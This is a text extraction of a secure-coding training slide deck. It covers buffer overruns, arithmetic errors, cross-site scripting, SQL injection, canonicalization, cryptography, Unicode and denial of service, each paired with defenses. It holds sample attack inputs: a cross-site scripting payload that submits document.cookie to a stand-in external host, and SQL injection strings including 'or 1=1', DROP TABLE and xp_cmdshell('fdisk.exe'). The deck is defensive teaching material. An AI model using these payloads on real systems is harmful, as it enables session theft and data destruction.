Name

1
Writing Secure Code Threat Defense

• Name
• Job Title
• Company

2
What We Will Cover

• The Need For Secure Code
• Defending Against Memory Issues
• Defending Against Arithmetic Errors
• Defending Against Cross-Site Scripting
• Defending Against SQL Injection
• Defending Against Canonicalization Issues
• Defending Against Cryptography Weaknesses
• Defending Against Unicode Issues
• Defending Against Denial of Service

3
Session Prerequisites

• Development experience with MicrosoftVisual
  Basic, Microsoft Visual C, or C

Level 200
4
Agenda

• The Need For Secure Code
• Defending Against Memory Issues
• Defending Against Arithmetic Errors
• Defending Against Cross-site Scripting
• Defending Against SQL Injection
• Defending Against Canonicalization Issues
• Defending Against Cryptography Weaknesses
• Defending Against Unicode Issues
• Defending Against Denial of Service

5
The Need for Secure Code
Up to 1,500 Web sites could have been affected
by a recent hacker attack
US port 'hit by UK hacker
Piracy cost more than 4,300 jobs and 850
million in damage
Several corporations said they lost 10 million
in a single break-in
Sobig virus accounted for 30 billion worth of
economic damages worldwide
Attacks will cost the world economy a whopping
1.6 trillion (US) this year
6
Threat Scenarios

• Employees connecting to companys network
• Wired, wireless, dial-up, VPN
• Company PCs, personally-owned systems
• Employees connecting to other networks
• Internet hotspots, partner networks, broadband
• Partners connecting to companys network
• Local vs. federated authentication
• Anonymous guests
• New scenarios and new threats

7
Potential Attackers

• Thieves
• Confidence tricksters
• Vandals
• Criminals
• Hackers
• It should be no surprise that attacks occur!

8
Common Types of Attack
9
Agenda

• The Need For Secure Code
• Defending Against Memory Issues
• Defending Against Arithmetic Errors
• Defending Against Cross-site Scripting
• Defending Against SQL Injection
• Defending Against Canonicalization Issues
• Defending Against Cryptography Weaknesses
• Defending Against Unicode Issues
• Defending Against Denial of Service

10
What Is a Buffer Overrun?

• Occurs when data exceeds the expected size and
  overwrites other values
• Exists primarily in unmanaged C/C code
• Includes four types
• Stack-based buffer overruns
• Heap overruns
• V-table and function pointer overwrites
• Exception handler overwrites

• Can be exploited by worms

11
Possible Results of Buffer Overruns
12
Stack-Based Buffer Overrun Example
Top of Stack
char4
int
Return address
13
Heap Overruns

• Overwrite data stored on the heap
• Are harder to exploit than a buffer overrun

xxxxxxxxxxxxxx
strcpy
14
Defending Against Buffer Overruns (1 of 2)

• Be very cautious when using
• strcpy
• strncpy
• CopyMemory
• MultiByteToWideChar
• Use the /GS compile option in Visual C to spot
  buffer overruns
• Use strsafe.h for safer buffer handling

15
Defending Against Buffer Overruns (2 of 2)

• Check all array indexes
• Use existing wrapper classes for safe array
  handling
• Check file path lengths using _MAX_PATH
• Use recognized file path processing methods, such
  as splitpath
• Use managed code, but pay attention to PInvoke
  and COM Interop

16
Agenda

• The Need For Secure Code
• Defending Against Memory Issues
• Defending Against Arithmetic Errors
• Defending Against Cross-site Scripting
• Defending Against SQL Injection
• Defending Against Canonicalization Issues
• Defending Against Cryptography Weaknesses
• Defending Against Unicode Issues
• Defending Against Denial of Service

17
Arithmetic Errors

• Occur when the limitations of a variable are
  exceeded
• Lead to serious runtime issues
• Are often overlooked and underestimated
• Include
• Overflow value too large for data type
• Underflow value too small for data type

18
Defending Against Arithmetic Errors

• Be conscious of the limitations of your chosen
  data types
• Write defensive code that checks for overflows
• Consider writing safe, reusable functions
• Consider using a safe template class (if coding
  in C)

19
Demonstration 1 Memory Issues and Data Type
ErrorsInvestigating Buffer OverrunsUsing the
/GS Compiler SwitchUsing STRSAFE.HPerforming
Safe Arithmetic Calculations
20
Agenda

• The Need For Secure Code
• Defending Against Memory Issues
• Defending Against Arithmetic Errors
• Defending Against Cross-Site Scripting
• Defending Against SQL Injection
• Defending Against Canonicalization Issues
• Defending Against Cryptography Weaknesses
• Defending Against Unicode Issues
• Defending Against Denial of Service

21
What Is Cross-Site Scripting?

• A technique that allows hackers to
• Execute malicious script in a clients Web
  browser
• Insert ltscriptgt, ltobjectgt, ltappletgt, ltformgt, and
  ltembedgt tags
• Steal Web session information and authentication
  cookies
• Access the client computer

Any Web page that renders HTMLcontaining user
input is vulnerable
22
Two Common Exploits of Cross-Site Scripting

• Attacking Web-based e-mail platforms and
  discussion boards
• Using HTML ltformgt tags to redirect private
  information

23
Form-Based Attacks (1 of 2)
Response.Write("Welcome" Request.QueryString("U
serName"))
24
Form-Based Attacks (2 of 2)
lta hrefhttp//www.contoso.msft/welcome.asp?name
ltFORM actionhttp//www. nwtraders.msft/data.asp
methodpost ididFormgt ltINPUT
namecookie typehiddengt lt/FORMgt
ltSCRIPTgt idForm.cookie.valuedocument.cookie
idForm.submit() lt/SCRIPTgt gt here lt/agt
25
Demonstration 2Cross-Site ScriptingInvestigatin
g Cross-Site Scripting
26
Defending Against Cross-Site Scripting Attacks

• Do not
• Trust user input
• Echo Web-based user input unless you have
  validated it
• Store secret information in cookies
• Do
• Use the HttpOnly cookie option
• Use the ltframegt security attribute
• Take advantage of ASP.NET features

27
Agenda

• The Need For Secure Code
• Defending Against Memory Issues
• Defending Against Arithmetic Errors
• Defending Against Cross-site Scripting
• Defending Against SQL Injection
• Defending Against Canonicalization Issues
• Defending Against Cryptography Weaknesses
• Defending Against Unicode Issues
• Defending Against Denial of Service

28
What is SQL Injection?

• SQL injection is
• The process of adding SQL statements in user
  input
• Used by hackers to
• Probe databases
• Bypass authorization
• Execute multiple SQL statements
• Call built-in stored procedures

29
Examples of SQL Injection
sqlString "SELECT HasShipped FROM" "
OrderDetail WHERE OrderID '" ID "'"

• If the ID variable is read directly from a Web
  form or Windows form textbox, the user could
  enter any of the following
• ALFKI1001
• ALFKI1001' or 11 --
• ALFKI1001' DROP TABLE OrderDetail --
• ALFKI1001' exec xp_cmdshell('fdisk.exe') --

30
Demonstration 3SQL InjectionInvestigating SQL
Injection IssuesUsing Parameterized Queries to
Defend Against SQL Injection
31
Defending Against SQL Injection

• Sanitize all input
• Consider all input as harmful until proven
  otherwise
• Look for valid data and reject everything else
• Consider the use of regular expressions to remove
  unwanted characters
• Run with least privilege
• Never execute as sa
• Restrict access to built-in stored procedures
• Use stored procedures or SQL parameterized
  queries to access data
• Do not echo ODBC errors

32
Agenda

• The Need For Secure Code
• Defending Against Memory Issues
• Defending Against Arithmetic Errors
• Defending Against Cross-site Scripting
• Defending Against SQL Injection
• Defending Against Canonicalization Issues
• Defending Against Cryptography Weaknesses
• Defending Against Unicode Issues
• Defending Against Denial of Service

33
Canonicalization Issues

• There is usually more than one way to name
  something
• Alternate representations exist for
• File names
• URLs
• Devices (such as printers)
• Hackers may exploit code that makes decisions
  based on file names or URLs

34
Canonicalization IssuesExample 1 File Names

• MyLongFile.txt
• MyLongFile.txt.
• MyLong1.txt
• MyLongFile.txtDATA

35
Canonicalization IssuesExample 2 Character
Representation

• There are many ways to represent characters on
  the Internet

http//www.microsoft.com/technet/security
Is the same as -
http//www2emicrosoft2ecom2ftechnet2fsecurity
http//www.microsoft.comc0aftechnetc0afsecurit
y http//www253265microsoft.com/technet/securit
y http//172.43.122.12 http//2888530444
36
Demonstration 4 Canonicalization
IssuesInvestigating File Name Security Decisions
37
Defending Against Canonicalization Issues

• Use file system security to restrict access to
  private data
• Never make a decision based on a name
• Disable the IIS Parent Paths setting

38
Agenda

• The Need For Secure Code
• Defending Against Memory Issues
• Defending Against Arithmetic Errors
• Defending Against Cross-site Scripting
• Defending Against SQL Injection
• Defending Against Canonicalization Issues
• Defending Against Cryptography Weaknesses
• Defending Against Unicode Issues
• Defending Against Denial of Service

39
Cryptography Weaknesses

• Inappropriate use of algorithms
• Creating your own
• Using weak ones
• Incorrect application
• Failure to keep keys secure
• Insecure storage
• Extensive duration of use
• The human factor

I need three of the above to decrypt your data!
40
Defending Against Cryptography Weaknesses

• Recycle keys periodically
• Use ACLs to restrict access to keys
• Store keys on an external device
• Use SACLs to monitor activities
• Use larger keys to provide increased security
• Use DPAPI to simplify key management, if possible
• Do not implement your own cryptographic routines

41
Agenda

• The Need For Secure Code
• Defending Against Memory Issues
• Defending Against Arithmetic Errors
• Defending Against Cross-site Scripting
• Defending Against SQL Injection
• Defending Against Canonicalization Issues
• Defending Against Cryptography Weaknesses
• Defending Against Unicode Issues
• Defending Against Denial of Service

42
Unicode Issues

• Common mistakes
• Treating a Unicode character as a single byte
• Miscalculating required buffer size
• Misusing MultiByteToWideChar
• Validating data before conversion, but not
  afterwards
• Results
• Buffer overruns
• Potentially dangerous character sequences
  slipping through your validation routines

43
Defending Against Unicode Issues

• Calculate buffer sizes using sizeof (WCHAR)
• Be aware of GB18030 standards (4 bytes per
  character)
• Convert from Unicode to ASCII and then validate
• Use IsNLSDefinedString during validation
• Use MultiByteToWideChar correctly to provide a
  sufficient buffer

44
Demonstration 5 Unicode IssuesInvestigating
Unicode Issues
45
Agenda

• The Need For Secure Code
• Defending Against Memory Issues
• Defending Against Arithmetic Errors
• Defending Against Cross-site Scripting
• Defending Against SQL Injection
• Defending Against Canonicalization Issues
• Defending Against Cryptography Weaknesses
• Defending Against Unicode Issues
• Defending Against Denial of Service

46
Denial of Service Attacks

• CPU starvation
• Memory starvation
• Resource starvation
• Network starvation

47
Defending Against Denial of Service Attacks

• Consider security as a design feature
• Distrust user input
• Fail intelligently
• Test security

48
Session Summary

• The Need For Secure Code
• Defending Against Memory Issues
• Defending Against Arithmetic Errors
• Defending Against Cross-site Scripting
• Defending Against SQL Injection
• Defending Against Canonicalization Issues
• Defending Against Cryptography Weaknesses
• Defending Against Unicode Issues
• Defending Against Denial of Service

49
Next Steps

• Stay informed about security
• Sign up for security bulletins
• http//www.microsoft.com/security/security_bullet
  ins/alerts2.asp
• Get the latest Microsoft security guidance
• http//www.microsoft.com/security/guidance/
• Get additional security training
• Find online and in-person training seminars
• http//www.microsoft.com/seminar/events/security.
  mspx
• Find a local CTEC for hands-on training
• http//www.microsoft.com/learning/

50
For More Information

• Microsoft Security Site (all audiences)
• http//www.microsoft.com/security
• MSDN Security Site (developers)
• http//msdn.microsoft.com/security
• TechNet Security Site (IT professionals)
• http//www.microsoft.com/technet/security

51
Questions and Answers
52
(No Transcript)